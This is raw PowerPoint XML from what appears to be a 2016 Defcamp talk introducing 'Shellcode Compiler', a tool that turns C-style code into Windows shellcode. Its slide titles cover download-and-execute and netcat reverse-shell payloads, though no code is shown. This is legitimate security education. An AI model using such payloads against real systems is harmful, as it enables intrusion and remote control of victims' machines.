              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>en.wikipedia.org/wiki/Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr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11066379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106" y="198156"/>
            <a:ext cx="5523448" cy="1151341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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusion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6038" y="1572862"/>
            <a:ext cx="11400917" cy="4196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667" dirty="0"/>
              <a:t>Shellcode Compiler is a free tool that can be used by anyone to create a custom shellcode. It is possible to call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1"/>
              <a:t>WinAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t> functions in a user-friendly way.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endParaRPr lang="en-US" sz="2667" dirty="0"/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667" dirty="0"/>
              <a:t>The generated shellcode will be small, position-independent and it will not contain NULL-bytes.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endParaRPr lang="en-US" sz="2667" dirty="0"/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667" dirty="0"/>
              <a:t>Even if this alpha version is limited, the tool will be constantly updated to get all the features required to write a complex shellcode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20562308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937" y="599764"/>
            <a:ext cx="4728464" cy="1994392"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="002060">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill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5785" y="3368528"/>
            <a:ext cx="10492153" cy="830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5333" dirty="0" err="1"/>
              <a:t>ionut.popescu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5333" dirty="0"/>
              <a:t> [a] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5333" dirty="0" err="1"/>
              <a:t>outlook.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5333" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17654686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Shellcode Compiler?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360" y="1676608"/>
            <a:ext cx="11186160" cy="3847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67" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2667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-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667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http://www.nasm.us/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667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algn="just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endParaRPr lang="en-US" sz="2667" dirty="0" err="1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6854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compiler?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="GCC_CompilationProce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5345" y="1593719"/>
            <a:ext cx="9539143" cy="446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801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shellcode?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360" y="1615440"/>
            <a:ext cx="11506200" cy="388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667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667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2667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2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667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sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>However, attempts at replacing the term have not gained wide acceptance. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode is commonly written in machine code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667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2667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5732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65760" y="1717041"/>
            <a:ext cx="10565848" cy="2461745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Information gathering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Version information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability discovery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Large amount of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyzing the crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Debugger </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writing the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Exploit the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Choose a shellcode for the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Reverse TCP? Bind TCP?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1" y="4717266"/>
            <a:ext cx="11165452" cy="71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Shellcode Compiler does NOT have anything to do with the exploitation process!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US" sz="1867" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>It will generate a shellcode that can be used for an already existing exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4313251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</TotalTime>
  <Words>2651</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>463</Paragraphs>
  <Slides>53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Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Athelas</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Museo Sans For Dell</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Slice</vt:lpstr>
      <vt:lpstr>Document</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Defcamp 2016</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Shellcode compiler</vt:lpstr>
      <vt:lpstr>What is Shellcode Compiler?</vt:lpstr>
      <vt:lpstr>What is a compiler?</vt:lpstr>
      <vt:lpstr>What is a shellcode?</vt:lpstr>
      <vt:lpstr>Exploitation </vt:lpstr>
      <vt:lpstr>Memory structure of a process</vt:lpstr>
      <vt:lpstr>ASLR - Address space layout randomization </vt:lpstr>
      <vt:lpstr>Shellcode limitations</vt:lpstr>
      <vt:lpstr>Shellcodes on Linux</vt:lpstr>
      <vt:lpstr>Linux syscalls</vt:lpstr>
      <vt:lpstr>Linux syscalls examples</vt:lpstr>
      <vt:lpstr>Linux shellcode example</vt:lpstr>
      <vt:lpstr>Windows shellcodes</vt:lpstr>
      <vt:lpstr>Step by step</vt:lpstr>
      <vt:lpstr>PE File Format</vt:lpstr>
      <vt:lpstr>General PE structure</vt:lpstr>
      <vt:lpstr>MS-DOS header</vt:lpstr>
      <vt:lpstr>MS-DOS header details</vt:lpstr>
      <vt:lpstr>PE header</vt:lpstr>
      <vt:lpstr>PE header structure</vt:lpstr>
      <vt:lpstr>Image section table</vt:lpstr>
      <vt:lpstr>Data directory</vt:lpstr>
      <vt:lpstr>PE imports table</vt:lpstr>
      <vt:lpstr>Process Environment Block</vt:lpstr>
      <vt:lpstr>Find kernel32.dll</vt:lpstr>
      <vt:lpstr>Find GetProcAddress</vt:lpstr>
      <vt:lpstr>Find LoadLibrary</vt:lpstr>
      <vt:lpstr>Load a DLL (urlmon.dll)</vt:lpstr>
      <vt:lpstr>Get function from DLL (URLDownloadToFile) </vt:lpstr>
      <vt:lpstr>Call URLDownloadToFile </vt:lpstr>
      <vt:lpstr>Get function from DLL (WinExec) </vt:lpstr>
      <vt:lpstr>WinExec and ExitProcess </vt:lpstr>
      <vt:lpstr>Shellcode compiler</vt:lpstr>
      <vt:lpstr>What do you think?</vt:lpstr>
      <vt:lpstr>Screenshot</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Working with files and Windows Registry</vt:lpstr>
      <vt:lpstr>Download and Execute</vt:lpstr>
      <vt:lpstr>Reverse shell (nc)</vt:lpstr>
      <vt:lpstr>Download and Load DLL</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Limitations</vt:lpstr>
      <vt:lpstr>WinAPI functions</vt:lpstr>
      <vt:lpstr>ANSI vs Unicode on WinAPI</vt:lpstr>
      <vt:lpstr>How it works</vt:lpstr>
      <vt:lpstr>Download Shellcode Compiler</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Questions?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Ionut Popescu</dc:creator>
  <cp:lastModifiedBy>Ionut Popescu</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-17T09:32:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-17T09:51:48Z</dcterms:modified>
</cp:coreProperties>
</file>